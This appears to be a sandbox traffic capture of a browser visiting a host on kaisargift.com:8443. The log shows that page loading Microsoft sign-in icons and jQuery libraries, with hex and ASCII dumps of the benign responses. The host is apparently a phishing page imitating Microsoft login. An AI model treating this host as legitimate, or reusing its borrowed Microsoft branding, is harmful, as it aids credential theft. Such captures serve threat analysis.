36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:01:57 UTC	714	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:01:57 UTC	611	IN	HTTP/1.1 200 OK Content-Type: image/svg+xml Content-MD5: TjUQkZ0p0Y7rbj6LJofS9Q== Last-Modified: Wed, 15 Jan 2025 17:52:54 GMT ETag: "0x8DD358D701F7AB6" x-ms-request-id: 8703fe84-701e-00ad-7f76-67cd12000000 x-ms-version: 2018-03-28 Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version Access-Control-Allow-Origin: * Cache-Control: public, max-age=24900657 Date: Wed, 02 Apr 2025 13:01:57 GMT Content-Length: 513 Connection: close Akamai-GRN: 0.8904d217.1743598917.2fe0f85
2025-04-02 13:01:57 UTC	513	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 31 38 2c 31 31 2e 35 37 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 38 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 39 34 34 2c 37 2e 30 35 36 6c 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.57

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:01:58 UTC	596	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:01:58 UTC	560	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Wed, 02 Apr 2025 13:01:58 GMT Via: 1.1 varnish Age: 91466 X-Served-By: cache-lga21990-LGA X-Cache: HIT X-Cache-Hits: 2 X-Timer: S1743598919.576192,VS0,VE0 Vary: Accept-Encoding
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-04-02 13:01:58 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-04-02 13:01:58 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:01:59 UTC	610	OUT	GET /jquery-3.3.1.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:01:59 UTC	563	IN	HTTP/1.1 200 OK Connection: close Content-Length: 271751 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-42587" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Age: 1903461 Date: Wed, 02 Apr 2025 13:01:59 GMT Via: 1.1 varnish X-Served-By: cache-lga21955-LGA X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1743598919.368611,VS0,VE1 Vary: Accept-Encoding
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 33 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 38 2d 30 31 2d 32 30 54 31 37 Data Ascii: /! jQuery JavaScript Library v3.3.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2018-01-20T17
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63 Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 63 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 0a 09 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 74 6f 54 79 70 65 28 20 6f 62 6a 20 29 20 7b 0a 09 69 66 20 28 20 6f 62 6a 20 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6f 62 6a 20 2b 20 22 22 3b 0a 09 7d 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 32 2e 33 20 6f 6e 6c 79 20 28 66 75 6e 63 74 69 6f 6e 69 73 68 20 52 65 67 45 78 70 29 0a 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 7c 7c 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3f 0a 09 Data Ascii: c.head.appendChild( script ).parentNode.removeChild( script );}function toType( obj ) {if ( obj == null ) {return obj + "";}// Support: Android <=2.3 only (functionish RegExp)return typeof obj === "object" \|\| typeof obj === "function" ?
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 7b 0a 09 09 09 72 65 74 75 72 6e 20 73 6c 69 63 65 2e 63 61 6c 6c 28 20 74 68 69 73 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 52 65 74 75 72 6e 20 6a 75 73 74 20 74 68 65 20 6f 6e 65 20 65 6c 65 6d 65 6e 74 20 66 72 6f 6d 20 74 68 65 20 73 65 74 0a 09 09 72 65 74 75 72 6e 20 6e 75 6d 20 3c 20 30 20 3f 20 74 68 69 73 5b 20 6e 75 6d 20 2b 20 74 68 69 73 2e 6c 65 6e 67 74 68 20 5d 20 3a 20 74 68 69 73 5b 20 6e 75 6d 20 5d 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 54 61 6b 65 20 61 6e 20 61 72 72 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 70 75 73 68 20 69 74 20 6f 6e 74 6f 20 74 68 65 20 73 74 61 63 6b 0a 09 2f 2f 20 28 72 65 74 75 72 6e 69 6e 67 20 74 68 65 20 6e 65 77 20 6d 61 74 63 68 65 64 20 65 6c 65 6d 65 6e 74 20 73 65 74 29 0a 09 70 75 73 68 53 Data Ascii: {return slice.call( this );}// Return just the one element from the setreturn num < 0 ? this[ num + this.length ] : this[ num ];},// Take an array of elements and push it onto the stack// (returning the new matched element set)pushS
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 65 72 79 2e 66 6e 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 6f 70 74 69 6f 6e 73 2c 20 6e 61 6d 65 2c 20 73 72 63 2c 20 63 6f 70 79 2c 20 63 6f 70 79 49 73 41 72 72 61 79 2c 20 63 6c 6f 6e 65 2c 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 30 20 5d 20 7c 7c 20 7b 7d 2c 0a 09 09 69 20 3d 20 31 2c 0a 09 09 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 0a 09 09 64 65 65 70 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 61 20 64 65 65 70 20 63 6f 70 79 20 73 69 74 75 61 74 69 6f 6e 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 3d 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 29 20 7b 0a 09 09 64 65 65 70 20 3d 20 74 61 72 67 65 74 3b Data Ascii: ery.fn.extend = function() {var options, name, src, copy, copyIsArray, clone,target = arguments[ 0 ] \|\| {},i = 1,length = arguments.length,deep = false;// Handle a deep copy situationif ( typeof target === "boolean" ) {deep = target;
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 65 2c 20 63 6f 70 79 20 29 3b 0a 0a 09 09 09 09 2f 2f 20 44 6f 6e 27 74 20 62 72 69 6e 67 20 69 6e 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 73 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 63 6f 70 79 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 63 6f 70 79 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 7b 0a 0a 09 2f 2f 20 55 6e 69 71 75 65 20 66 6f 72 20 65 61 63 68 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 20 6f 6e 20 74 68 65 20 70 61 67 65 0a 09 65 Data Ascii: e, copy );// Don't bring in undefined values} else if ( copy !== undefined ) {target[ name ] = copy;}}}}// Return the modified objectreturn target;};jQuery.extend( {// Unique for each copy of jQuery on the pagee
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 09 09 44 4f 4d 45 76 61 6c 28 20 63 6f 64 65 20 29 3b 0a 09 7d 2c 0a 0a 09 65 61 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 20 6f 62 6a 2c 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 76 61 72 20 6c 65 6e 67 74 68 2c 20 69 20 3d 20 30 3b 0a 0a 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 6c 65 6e 67 74 68 20 3d 20 6f 62 6a 2e 6c 65 6e 67 74 68 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20 Data Ascii: DOMEval( code );},each: function( obj, callback ) {var length, i = 0;if ( isArrayLike( obj ) ) {length = obj.length;for ( ; i < length; i++ ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {break;}}}
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 62 61 63 6b 45 78 70 65 63 74 20 3d 20 21 69 6e 76 65 72 74 3b 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 61 72 72 61 79 2c 20 6f 6e 6c 79 20 73 61 76 69 6e 67 20 74 68 65 20 69 74 65 6d 73 0a 09 09 2f 2f 20 74 68 61 74 20 70 61 73 73 20 74 68 65 20 76 61 6c 69 64 61 74 6f 72 20 66 75 6e 63 74 69 6f 6e 0a 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 3d 20 21 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 20 29 3b 0a 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 21 3d 3d 20 63 61 6c 6c 62 61 63 6b 45 78 70 65 63 74 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 65 73 2e 70 75 73 68 28 20 65 Data Ascii: backExpect = !invert;// Go through the array, only saving the items// that pass the validator functionfor ( ; i < length; i++ ) {callbackInverse = !callback( elems[ i ], i );if ( callbackInverse !== callbackExpect ) {matches.push( e
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 63 6c 61 73 73 32 74 79 70 65 5b 20 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 6e 61 6d 65 20 2b 20 22 5d 22 20 5d 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 7d 20 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 7b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 72 65 61 6c 20 69 4f 53 20 38 2e 32 20 6f 6e 6c 79 20 28 6e 6f 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 73 69 6d 75 6c 61 74 6f 72 29 0a 09 2f 2f 20 60 69 6e 60 20 63 68 65 63 6b 20 75 73 65 64 20 74 6f 20 70 72 65 76 65 6e 74 20 4a 49 54 20 65 72 72 6f 72 20 28 67 68 2d 32 31 34 35 29 0a 09 2f 2f 20 68 61 73 4f 77 6e 20 69 73 6e 27 74 20 75 73 65 64 20 68 65 72 65 20 64 75 65 20 74 Data Ascii: , name ) {class2type[ "[object " + name + "]" ] = name.toLowerCase();} );function isArrayLike( obj ) {// Support: real iOS 8.2 only (not reproducible in simulator)// `in` check used to prevent JIT error (gh-2145)// hasOwn isn't used here due t
2025-04-02 13:01:59 UTC	1378	IN	Data Raw: 6e 73 74 61 6e 63 65 20 6d 65 74 68 6f 64 73 0a 09 68 61 73 4f 77 6e 20 3d 20 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 0a 09 61 72 72 20 3d 20 5b 5d 2c 0a 09 70 6f 70 20 3d 20 61 72 72 2e 70 6f 70 2c 0a 09 70 75 73 68 5f 6e 61 74 69 76 65 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 70 75 73 68 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 2c 0a 09 2f 2f 20 55 73 65 20 61 20 73 74 72 69 70 70 65 64 2d 64 6f 77 6e 20 69 6e 64 65 78 4f 66 20 61 73 20 69 74 27 73 20 66 61 73 74 65 72 20 74 68 61 6e 20 6e 61 74 69 76 65 0a 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 6a 73 70 65 72 66 2e 63 6f 6d 2f 74 68 6f 72 2d 69 6e 64 65 78 6f 66 2d 76 73 2d 66 6f 72 2f 35 0a 09 69 6e 64 65 78 4f 66 20 3d 20 66 75 6e Data Ascii: nstance methodshasOwn = ({}).hasOwnProperty,arr = [],pop = arr.pop,push_native = arr.push,push = arr.push,slice = arr.slice,// Use a 